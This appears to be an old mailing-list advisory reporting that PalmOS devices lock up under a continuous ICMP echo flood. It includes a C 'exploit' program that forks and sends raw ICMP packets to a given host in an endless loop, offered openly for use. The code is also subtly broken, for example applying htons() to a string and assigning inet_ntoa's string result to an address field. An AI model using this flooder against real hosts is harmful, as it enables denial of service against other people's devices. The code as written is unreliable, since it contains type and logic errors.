-[BACKGROUND]-:

PalmOS is vulnerable to an ICMP DoS attack, when an
attacker continuously sends ICMP_ECHO packets to the
device.  This attack causes 100% CPU usage, and the
device therefore comes to a total lockup.  The Pilot
is almost instantly rendered unusable, until the
attacker stops sending packets, or the device is
reset.  The DoS attack often forces PalmOS to lose
it's network connections (Internet and LAN connects
etc...), due to the exhaustion of sending replies to
the continuous hoard of ICMP_ECHO packets it is
receiving.
Although unconfirmed (haven't seen it happen yet),
this attack may even cause the device to display the
message "Fatal exception", and require resetting
immediately.
Although the vulnerability does not cause any data to
be lost (unless the Palm is DoSed when a user is doing
some work), this could still be extremely annoying to
the Palm user trying to check his e-mail or writing a
document.  If the user is writing a document or doing
some other form of work, and the attacker is
persistant (won't stop until the device is offline),
it would almost certainly mean loss of data since the
user last save the document, because the user would
probably end up resetting. 


-[EXPLOIT]-:

To exploit the vulnerability, you would need to
continuous send ICMP_ECHO packets, without waiting for
a reply, by using one than more process for optional
added effect (by using fork()'s).
I wrote the following exploit program to exploit the
vulnerability in PalmOS:

------------------CUT HERE-------------------
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
int main(int argc, char *argv[]) {
        if(argc < 2) {
                printf("Usage: %s <host>\n", argv[0]);
                exit(0);
        }

        int sock;
        char packet[2000];
        struct sockaddr_in dest;
        struct hostent *host;
        struct iphdr *ip = (struct iphdr *) packet;
        struct icmphdr *icmp = (struct icmp *) packet
+ sizeof(struct iphdr);
        if((host = gethostbyname(argv[1])) == NULL) {
                printf("Couldn't resolve host!\n");
                exit(-1);
        }

        if((sock = socket(AF_INET, SOCK_RAW,
IPPROTO_ICMP)) == -1) {
                printf("Couldn't make socket!\n");
                printf("You must be root to create a
raw socket.\n");
                exit(-1);
        }

        dest.sin_family = AF_INET;
        dest.sin_addr = *((struct in_addr
*)host->h_addr);
        ip->ihl = 5;
        ip->id = htons(1337);
        ip->ttl = 255;
        ip->tos = 0;
        ip->protocol = IPPROTO_ICMP;
        ip->version = 4;
        ip->frag_off = 0;
        ip->saddr = htons("127.0");
        ip->daddr = inet_ntoa(dest.sin_addr);
        ip->tot_len = sizeof(struct iphdr) +
sizeof(struct icmphdr);
        ip->check = 0;
        icmp->checksum = 0;
        icmp->type = ICMP_ECHO;
        icmp->code = 0;
        printf("Ping flooding %s!\n", argv[1]);
        fork();
        fork();
        while(1) {
                sendto(sock, packet, ip->tot_len, 0,
(struct sockaddr *)&dest, sizeof(struct sockaddr));
        }
        return(0);
}
------------------CUT HERE-------------------


Thank you for your time.
Shaun.

__________________________________________________
Yahoo! Plus
For a better Internet experience
http://www.yahoo.co.uk/btoffer